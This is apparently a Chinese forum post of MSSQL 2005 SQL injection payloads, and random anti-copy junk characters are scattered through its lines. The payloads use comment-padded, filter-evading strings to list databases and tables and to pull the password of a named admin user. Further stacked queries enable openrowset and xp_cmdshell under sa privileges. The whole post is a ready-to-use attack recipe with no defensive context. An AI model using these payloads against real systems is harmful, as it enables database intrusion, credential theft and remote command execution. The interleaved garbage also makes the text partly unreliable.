8 h) Z4 ^ r# L, J9 D: p+ q( ]* i6 V5 [$ R
# S: f+ M7 l2 f6 p- c6 S4 ^2 }. Y[Copy to clipboard]CODE:
1 l% v6 ^: w% t0 [& [/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
* y& z# R7 l& M# u# F( T* }& E$ E- `% m
爆表语句,somedb部份是所要列的数据库,红色数字1累加
& o: N" r) |% i# Q' l) b5 t) Y6 ^ w8 g
; }3 u' r) |% i9 d$ s[Copy to clipboard]CODE:, N: L+ Z z" `
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--. P3 J) |" m5 n" u: v
. Z; W! A% B- K) @
爆字段语句,爆表admin里user='icerover'的密码段
7 H& }/ \% [; r, e
! d0 R1 ]+ r: t4 u. f' A5 v: a
+ G% g& L5 L$ _; s/ N[Copy to clipboard]CODE:3 w2 \% t) E7 G
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--7 ]- {8 c3 D1 T# v, m2 a3 r
" }4 Z$ m4 D% o2 r0 tmssql2005默认没有开xp_cmdshell的,openrowset也不能用
: A; O7 I; h$ c4 g& B" \如果是sa权限,可以这样来开启
1 q) Z5 ?. l4 X开启openrowset" m4 ~: g7 V* |
2 S; B+ J5 ?5 }% f7 U8 K
" X/ W8 U1 q L! G7 D) g+ Y[Copy to clipboard]CODE:* D' `! \$ d% z" |( p& s
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--* D8 p5 X6 I+ e, o$ B" B4 z, Z
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
) S: U5 x6 u' c+ q+ X, b0 O" @$ y7 b
开启xp_cmdshell
; N7 h" [5 r, v4 P8 d! O4 \6 K0 G, j2 r4 ^5 S
1 E3 I; o. r5 g7 u( O
[Copy to clipboard]CODE:4 v( a. z2 B& x' j
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--& U0 e0 q! `: P3 _: d
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--' g5 |- w) o/ D- t) L
/ Z. Y7 {8 s- J
ok,over~~晚安% i4 |* V% n$ \# G$ F ?4 c
|